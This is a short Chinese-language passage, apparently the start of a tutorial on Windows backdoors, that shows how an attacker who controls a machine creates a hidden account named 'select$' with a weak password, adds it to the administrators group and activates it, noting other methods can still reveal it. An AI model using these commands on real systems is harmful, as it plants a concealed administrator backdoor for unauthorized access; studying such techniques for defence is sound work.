前言
后门是攻击者出入系统的通道,惟其如此它隐蔽而危险,攻击者利用后门技术如入无人之境
一、创建隐藏用户
1. 创建用户
1.1、攻击者控制某台机器,并执行添加用户指令
1. net user select$ 123 /add #创建一个名为select的用户,密码为123,$代表隐藏
2. net localgroup administrators select$ /add #将select用户的权限提升到管理级别
3. net user select$ /active:yes #激活select用户
此时虽然使用命令行无法看到 select$ 隐藏用户,但是采用其它方法仍旧可以发现select$